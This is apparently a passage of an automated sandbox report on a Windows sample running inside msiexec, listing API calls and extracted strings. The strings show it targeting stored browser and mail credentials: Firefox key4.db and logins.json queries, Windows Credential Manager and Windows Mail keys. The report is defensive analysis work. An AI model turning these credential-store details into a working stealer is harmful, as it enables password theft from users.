                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                        • DeleteObject.GDI32(?), ref: 00401226
                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                        • ShowWindow.USER32(00000000), ref: 00401253
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                        • ShowWindow.USER32(00000000), ref: 00401262
                                                                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                        • memset.MSVCRT ref: 0040128E
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2998058495-0
                                                                                        APIs
                                                                                          • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                          • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                        • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                        • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                        • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                        • _strcmpi.MSVCRT ref: 0040BE93
                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                        • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                        • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                        • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                        • strlen.MSVCRT ref: 0040BEFE
                                                                                        • strlen.MSVCRT ref: 0040BF0C
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                          • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                          • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                        • memset.MSVCRT ref: 0040BFDB
                                                                                        • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                        • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                        • API String ID: 2303586283-933021314
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                        • API String ID: 231171946-2189169393
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                        • API String ID: 633282248-1996832678
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406782
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                        Strings
                                                                                        • key4.db, xrefs: 00406756
                                                                                        • , xrefs: 00406834
                                                                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp$memsetstrlen
                                                                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                        • API String ID: 3614188050-3983245814
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A973
                                                                                        • memset.MSVCRT ref: 0040A996
                                                                                        • memset.MSVCRT ref: 0040A9AC
                                                                                        • memset.MSVCRT ref: 0040A9BC
                                                                                        • sprintf.MSVCRT ref: 0040A9F0
                                                                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                        • sprintf.MSVCRT ref: 0040AABE
                                                                                        • _mbscat.MSVCRT ref: 0040AAED
                                                                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                        • sprintf.MSVCRT ref: 0040AB21
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                        • API String ID: 710961058-601624466
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: sprintf$memset$_mbscpy
                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                        • API String ID: 3402215030-3842416460
                                                                                        APIs
                                                                                          • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                          • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                          • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                          • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                          • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                          • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                        • strlen.MSVCRT ref: 0040F139
                                                                                        • strlen.MSVCRT ref: 0040F147
                                                                                        • memset.MSVCRT ref: 0040F187
                                                                                        • strlen.MSVCRT ref: 0040F196
                                                                                        • strlen.MSVCRT ref: 0040F1A4
                                                                                        • memset.MSVCRT ref: 0040F1EA
                                                                                        • strlen.MSVCRT ref: 0040F1F9
                                                                                        • strlen.MSVCRT ref: 0040F207
                                                                                        • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                        • API String ID: 2003275452-3138536805
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C3F7
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                        • strrchr.MSVCRT ref: 0040C417
                                                                                        • _mbscat.MSVCRT ref: 0040C431
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                        • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00444612
                                                                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                        • strlen.MSVCRT ref: 0044462E
                                                                                        • memset.MSVCRT ref: 00444668
                                                                                        • memset.MSVCRT ref: 0044467C
                                                                                        • memset.MSVCRT ref: 00444690
                                                                                        • memset.MSVCRT ref: 004446B6
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                        • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen$_mbscpy
                                                                                        • String ID: salu
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                        APIs
                                                                                        • sprintf.MSVCRT ref: 0040957B
                                                                                        • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                          • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                          • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                          • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                          • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                        • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                        • sprintf.MSVCRT ref: 004095EB
                                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                        • memset.MSVCRT ref: 0040961C
                                                                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                        • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                        • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                                        APIs
                                                                                          • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                        APIs
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • strlen.MSVCRT ref: 00443AD2
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                        • memset.MSVCRT ref: 00443B2E
                                                                                        • memset.MSVCRT ref: 00443B4B
                                                                                        • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                        • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                          • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                        Strings
                                                                                        • Salt, xrefs: 00443BA7
                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                        • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                        APIs
                                                                                        • wcsstr.MSVCRT ref: 0040426A
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                        • strchr.MSVCRT ref: 004042F6
                                                                                        • strlen.MSVCRT ref: 0040430A
                                                                                        • sprintf.MSVCRT ref: 0040432B
                                                                                        • strchr.MSVCRT ref: 0040433C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                        • String ID: %s@gmail.com$www.google.com
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                          • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                          • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                          • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                        • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                        • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                        • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                        • memset.MSVCRT ref: 004097BD
                                                                                        • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                        APIs
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                        • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                        • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                          • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                          • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                          • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                        • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                        • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                        • SetFocus.USER32(?), ref: 0040CB92
                                                                                        • SetFocus.USER32(?), ref: 0040CC0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                        • API String ID: 2360744853-2229823034
                                                                                        APIs
                                                                                        • strchr.MSVCRT ref: 004100E4
                                                                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                        • _mbscat.MSVCRT ref: 0041014D
                                                                                        • memset.MSVCRT ref: 00410129
                                                                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                        • memset.MSVCRT ref: 00410171
                                                                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                        • _mbscat.MSVCRT ref: 00410197
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                        • String ID: \systemroot
                                                                                        • API String ID: 912701516-1821301763
                                                                                        APIs
                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        Strings
                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                        Similarity
                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                        • API String ID: 1640410171-2022683286
                                                                                        APIs
                                                                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$strlen
                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                        • API String ID: 2619041689-3408036318
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: free$strlen
                                                                                        • String ID:
                                                                                        • API String ID: 667451143-3916222277
                                                                                        APIs
                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
